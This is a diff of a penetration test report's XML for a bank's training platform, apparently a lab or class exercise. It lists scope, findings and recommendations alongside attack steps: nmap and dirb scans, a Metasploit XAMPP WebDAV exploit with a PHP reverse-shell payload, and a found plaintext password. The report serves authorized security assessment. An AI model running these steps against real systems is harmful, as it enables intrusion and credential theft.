+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="23" name="Picture 23" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6858000" cy="2540000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Data Exploitation</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13A7B879" wp14:editId="246BA522">
+            <wp:extent cx="6858000" cy="443865"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="24" name="Picture 24"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6858000" cy="443865"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Example of data exfiltration on machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Findings: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Password to 10.1.0.12 is Password123!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="32" w:name="_z1i274yoj4um" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="32"/>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId15"/>
-      <w:footerReference w:type="first" r:id="rId16"/>
+      <w:footerReference w:type="default" r:id="rId26"/>
+      <w:footerReference w:type="first" r:id="rId27"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgNumType w:start="0"/>
@@ -3961,6 +5577,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2D0432B5"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="F87C6D88"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="370B6BF2"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="CB0405C8"/>
@@ -4073,7 +5775,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5E4A1492"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="911E9A1E"/>
@@ -4186,7 +5888,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6C251E20"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="C9542720"/>
@@ -4299,23 +6001,115 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="70E71B9C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="AC7E008E"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="6">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>
@@ -4716,7 +6510,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00580126"/>
+    <w:rsid w:val="00AB38F3"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading1">
     <w:name w:val="heading 1"/>
@@ -4740,6 +6534,7 @@
     <w:name w:val="heading 2"/>
     <w:basedOn w:val="Normal"/>
     <w:next w:val="Normal"/>
+    <w:link w:val="Heading2Char"/>
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -5016,6 +6811,31 @@
     <w:rPr>
       <w:color w:val="0000FF" w:themeColor="hyperlink"/>
       <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="UnresolvedMention">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="006D106C"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
+    <w:name w:val="Heading 2 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="000A798F"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
+      <w:b/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
 </w:styles>

--- a/Project Report.docx
+++ b/Project Report.docx
@@ -451,7 +451,14 @@
                                 <w:color w:val="595959"/>
                                 <w:sz w:val="22"/>
                               </w:rPr>
-                              <w:t>April 12</w:t>
+                              <w:t>April 1</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="595959"/>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>3</w:t>
                             </w:r>
                             <w:r>
                               <w:rPr>
@@ -461,7 +468,6 @@
                               </w:rPr>
                               <w:t>th</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:color w:val="595959"/>
@@ -469,7 +475,6 @@
                               </w:rPr>
                               <w:t xml:space="preserve"> 2022</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramEnd"/>
                           </w:p>
                         </w:txbxContent>
                       </wps:txbx>
@@ -558,7 +563,14 @@
                           <w:color w:val="595959"/>
                           <w:sz w:val="22"/>
                         </w:rPr>
-                        <w:t>April 12</w:t>
+                        <w:t>April 1</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="595959"/>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>3</w:t>
                       </w:r>
                       <w:r>
                         <w:rPr>
@@ -568,7 +580,6 @@
                         </w:rPr>
                         <w:t>th</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:color w:val="595959"/>
@@ -576,7 +587,6 @@
                         </w:rPr>
                         <w:t xml:space="preserve"> 2022</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramEnd"/>
                     </w:p>
                   </w:txbxContent>
                 </v:textbox>
@@ -2204,7 +2214,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2275,7 +2285,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>10</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2362,9 +2372,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>The PJBank CISO authorized the development of a cybersecurity training program to improve their network security posture.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2373,9 +2382,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>PJBank</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> PJ professional IT services has been contracted to </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2384,9 +2392,32 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> CISO authorized the development of a cybersecurity training program </w:t>
-      </w:r>
-      <w:r>
+        <w:t>test the new training program platform for security weaknesses.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc100619258"/>
+      <w:r>
+        <w:t>Scope</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>We will be testing four pieces of infrastructure linked to the training program.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b w:val="0"/>
@@ -2394,8 +2425,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc100619259"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2404,92 +2435,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> improve their network security posture.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> PJ professional IT services has been contracted to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>test the new training program platform for security weaknesses.</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc100619258"/>
-      <w:r>
-        <w:t>Scope</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="6"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>We will be testing four pieces of infrastructure linked to the training program.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc100619259"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>The Debian server in the DMZ (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>DMZIServer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> | 10.1.0.7)</w:t>
+        <w:t>The Debian server in the DMZ (DMZIServer | 10.1.0.7)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="7"/>
     </w:p>
@@ -2747,7 +2693,7 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Do not use the same username and password across machines.</w:t>
+        <w:t>Implement software maintenance and version policies.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2759,7 +2705,7 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Delete the keys file from the DMZI server. It contains SSH login credentials on a publicly accessible URL.</w:t>
+        <w:t>Implement sensitive data policies.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2771,7 +2717,7 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Do not store snapshots of the server in a vulnerable state.</w:t>
+        <w:t>Do not use the same username and password across machines.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2783,7 +2729,31 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Do not use common words as passwords.</w:t>
+        <w:t>Delete the keys file from the DMZI server. It contains SSH login credentials on a publicly accessible URL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Do not store snapshots of the server in a vulnerable state.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Require complex password policy.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2951,13 +2921,7 @@
         <w:rPr>
           <w:color w:val="FFC000"/>
         </w:rPr>
-        <w:t>Medium</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FFC000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Medium </w:t>
       </w:r>
       <w:r>
         <w:t>Risk Vulnerabilities</w:t>
@@ -3037,6 +3001,26 @@
           <w:color w:val="000000"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>3. Machines are vulnerable to Varnish DDOS attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3094,15 +3078,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Command: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dirb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Command: dirb </w:t>
       </w:r>
       <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
@@ -3202,7 +3178,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0402D943" wp14:editId="46AC7DCF">
             <wp:extent cx="6858000" cy="2540000"/>
@@ -3262,28 +3237,12 @@
         <w:t>Scan for service versions</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> aggressive scan.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Command: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -A 10.1.2.4</w:t>
+        <w:t xml:space="preserve"> with nmap aggressive scan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Command: nmap -A 10.1.2.4</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3331,16 +3290,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Research exploits on outdated version of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
+        <w:t xml:space="preserve">Research exploits on outdated version of nmap: </w:t>
       </w:r>
       <w:hyperlink r:id="rId15" w:history="1">
         <w:r>
@@ -3358,21 +3308,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>msfconsole</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>use exploit/windows/http/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xampp_webdav_upload_php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>use exploit/windows/http/xampp_webdav_upload_php</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -3381,13 +3324,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>set payload php/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>reverse_php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>set payload php/reverse_php</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -4023,15 +3961,7 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:t>The Debian server in the DMZ (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>DMZIServer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> | 10.1.0.7)</w:t>
+        <w:t>The Debian server in the DMZ (DMZIServer | 10.1.0.7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4106,15 +4036,7 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Host: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Fastly</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, GitHub</w:t>
+        <w:t>Website: learnaboutsecurity.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4125,10 +4047,15 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>Email Provider</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: No MX Records</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Host: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Fastly</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, GitHub</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4139,10 +4066,10 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>Content Management System</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: WordPress</w:t>
+        <w:t>Email Provider</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: No MX Records</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4153,10 +4080,7 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>Software and Services</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: CRON, ATOM</w:t>
+        <w:t>Spam Service: NA</w:t>
       </w:r>
     </w:p>
     <w:p>
